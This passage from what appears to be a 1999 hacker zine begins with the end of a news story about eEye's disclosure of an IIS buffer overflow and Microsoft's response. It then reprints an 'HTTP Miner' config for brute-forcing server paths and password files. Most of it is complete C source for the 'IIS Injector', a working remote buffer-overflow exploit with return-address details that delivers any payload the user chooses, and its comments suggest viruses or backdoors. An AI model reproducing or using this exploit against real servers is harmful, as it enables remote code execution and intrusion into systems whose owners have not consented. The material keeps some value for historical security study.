Since then, eEye has gotten hundreds of e-mail messages in favor
of its decision, compared to about four criticizing it, Bushnaq
said.
"The big issue now is that Microsoft's PR is [painting] eEye as a
company that's irresponsible and pointing to something bad,"
Bushnaq said.
But Culp said Microsoft's security team had been working intensively
with eEye, as it does with other companies and users that report
security problems. They had had exchanged about 20 e-mail messages
last week, before eEye unilaterally decided to go public, he said.
"[Their decision] left a lot of people at risk ... compounded by
irresponsibly publishing that [exploitation] tool," Culp said.
Microsoft hopes to release the final patch very soon, Culp said.
In the meantime, the company is offering a workaround in its June
15 security bulletin, which can be found at
www.microsoft.com/security/bulletins/ms99-019.asp
eEye's patch can be found at www.eeye.com/database/advisories/
ad06081999/ad06081999-ogle.html
eEye, a unit of eCompany LLC, in Corona del Mar, Calif., is at
www.eeye.com. Microsoft Corp., in Redmond, Wash., is at
www.microsoft.com.
http://www.infoworld.com/cgi-bin/displayStory.pl?990617.hneeye.htm
------------------------------
4.03 --=\\iss_brain.ini.txt\\=--
[General]
Title=HTTP Miner
[Commands]
1=GET /%%$RPT(65,40,10)%%.%%extention%% HTTP/1.0
;2=GET /%%cgi-bin%%/%%passwordpath%%/%%passwordfile%%.%%extention%% HTTP/1.0
[Variables]
cgi-bin=cgi-bin,cgi,bin,cgibin,data,dat,exec,apps,secure,hide,
extention=htr,html,htx,asp,exe,xml,ini,txt,dat,dbf,lst,data,
passwordpath=password,passwords,pass,users,clients,admins,store,
passwordfile=password,passwords,pass,users,clients,admins,store,
c0=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_,
c1=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_,
c2=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_,
c3=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_,
c4=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_,
c5=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_,
c6=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_,
c7=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_,
c8=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_,
c9=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_,
e0=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_,
e1=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_,
e2=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_,
------------------------------
4.04 --=\\iss_injector.c.txt\\=--
I read yesturday on eEye.com that they had discovered a buffer overflow in
IIS. I could not resist writing an exploit. I did not have time to design
a really cool payload for this exploit, so I simply wrote the injection
code. However, this is meaningful for several reasons. Attached is the
injection code. The exploit will deliver any payload of your choosing.
Your payload will be executed. This empowers you to create a "collection"
of payloads that are not dependant upon the injection vector in any way.
This decoupling is important for military needs, where a single injection
vector needs to work, but the "warhead" may be different depending on the
targets characterization.
The exploit was fairly simple to build. In short, I read on eEye.com that
they had overflowed IIS with something like a ~3000 character URL. Within
minutes I had caused IIS to crash with EIP under my control. I used a
special pattern in the buffer (see code) to make it easy for me to identify
where EIP was being popped from. The pattern also made it easy to
determine where I was jumping around. Use the tekneek Danielson. ;-)
So, I controlled EIP, but I needed to get back to my stack segment, of
course. This is old school, and I really lucked out. Pushed down two
levels on the stack was an address for my buffer. I couldn't have asked
for more. So, I found a location in NTDLL.DLL (0x77F88CF0) that I could
return to. It had two pop's followed by a return. This made my injection
vector return to the value that was stored two layers down on the stack.
Bam, I was in my buffer. So, I landed in a weird place, had to add a near
jump to get to somewhere more useful.. nothing special, and here we are
with about 2K of payload space. If you don't supply any mobile code to be
run, the injection vector will supply some for you. The default payload in
simply a couple of no-ops followed by a debug breakpoint (interrupt 3)...
It's easy to play with if you want to build your own payloads.. just keep a
debugger attached to inetinfo.exe on the target machine.
Lastly, I would simply like to point out that monoculture installations are
very dangerous. It's a concept from agribusiness.. if you have all one
crop, and a virus comes along that can kill that crop, your out of
business. With almost ALL of the IIS servers on the net being vulnerable
to this exploit, we also have a monoculture. And, it's not just IIS. The
backbone of the Internet is built on common router technology (such as
cisco IOS). If a serious exploit comes along for the IOS kernel, can you
imagine the darkness that will fall?
<--- snip
// IIS Injector for NT
// written by Greg Hoglund <hoglund@ieway.com>
// http://www.rootkit.com
//
// If you would like to deliver a payload, it must be stored in a binary file.
// This injector decouples the payload from the injection code allowing you to
// create a numnber of different attack payloads. This code could be used, for
// example, by a military that needs to attack IIS servers, and has characterized
// the eligible hosts. The proper attack can be chosen depending on needs. Since
// the payload is so large with this injection vector, many options are available.
// First and foremost, virii can delivered with ease. The payload is also plenty
// large enough to remotely download and install a back door program.
// Considering the monoculture of NT IIS servers out on the 'Net, this represents a
// very serious security problem.
#include <windows.h>
#include <stdio.h>
#include <winsock.h>
void main(int argc, char **argv)
{
SOCKET s = 0;
WSADATA wsaData;
if(argc < 2)
{
fprintf(stderr, "IIS Injector for NT\nwritten by Greg Hoglund, " \
"http://www.rootkit.com\nUsage: %s <target" \
"ip> <optional payload file>\n", argv[0]);
exit(0);
}
WSAStartup(MAKEWORD(2,0), &wsaData);
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(INVALID_SOCKET != s)
{
SOCKADDR_IN anAddr;
anAddr.sin_family = AF_INET;
anAddr.sin_port = htons(80);
anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);
if(0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct sockaddr)))
{
static char theSploit[4096];
// fill pattern
char kick = 'z'; //0x7a
char place = 'A';
// my uber sweet pattern gener@t0r
for(int i=0;i<4096;i+=4)
{
theSploit[i] = kick;
theSploit[i+1] = place;
theSploit[i+2] = place + 1;
theSploit[i+3] = place + 2;
if(++place == 'Y') // beyond 'XYZ'
{
place = 'A';
if(--kick < 'a') kick = 'a';
}
}
_snprintf(theSploit, 5, "get /");
_snprintf(theSploit + 3005, 22, "BBBB.htr HTTP/1.0\r\n\r\n\0");
// after crash, looks like inetinfo.exe is jumping to the address
// stored @ location 'GHtG' (0x47744847)
// cross reference back to the buffer pattern, looks like we need
// to store our EIP into theSploit[598]
// magic eip into NTDLL.DLL
theSploit[598] = (char)0xF0;
theSploit[599] = (char)0x8C;
theSploit[600] = (char)0xF8;
theSploit[601] = (char)0x77;
// code I want to execute
// will jump foward over the
// embedded eip, taking us
// directly to the payload
theSploit[594] = (char)0x90; //nop
theSploit[595] = (char)0xEB; //jmp
theSploit[596] = (char)0x35; //
theSploit[597] = (char)0x90; //nop
// the payload. This code is executed remotely.
// if no payload is supplied on stdin, then this default
// payload is used. int 3 is the debug interrupt and
// will cause your debugger to "breakpoint" gracefully.
// upon examiniation you will find that you are sitting
// directly in this code-payload.
if(argc < 3)
{
theSploit[650] = (char) 0x90; //nop
theSploit[651] = (char) 0x90; //nop
theSploit[652] = (char) 0x90; //nop
theSploit[653] = (char) 0x90; //nop
theSploit[654] = (char) 0xCC; //int 3
theSploit[655] = (char) 0xCC; //int 3
theSploit[656] = (char) 0xCC; //int 3
theSploit[657] = (char) 0xCC; //int 3
theSploit[658] = (char) 0x90; //nop
theSploit[659] = (char) 0x90; //nop
theSploit[660] = (char) 0x90; //nop
theSploit[661] = (char) 0x90; //nop
}
else
{
// send the user-supplied payload from
// a file. Yes, that's a 2K buffer for
// mobile code. Yes, that's big.
FILE *in_file;
in_file = fopen(argv[2], "rb");
if(in_file)
{
int offset = 650;
while( (!feof(in_file)) && (offset < 3000))
{
theSploit[offset++] = fgetc(in_file);
}
fclose(in_file);
}
}
send(s, theSploit, strlen(theSploit), 0);
}
closesocket(s);
}
}
------------------------------
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
. Quote #3- .
. .
. "Hey anyone need an easy way to make $50?" .
. -JayPee .
. .
. Quote made up by Lord Oak. .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Please go to: www.thepoison.org/popup.html and click on our sponsors because we have to
pay the bills someway! It doesn't cost you anything (except 10 seconds) to go there and
click on it.
_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
_| _|
_| _| _| _| _| _| _| _|
_| _| _| _|_| _| _|_| _| _|
_| _|_|_|_| _| _| _| _| _| _| _|
_| _| _| _| _|_| _| _|_| _|
_| _| _| _| _| _| _| _|
_| Antidote is an HNN Affiliate _|
_| http://www.hackernews.com _|
_| _|
_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
All ASCII art in this issue is done by Lord Oak [lordoak@thepoison.prg] and permission
is needed before using.
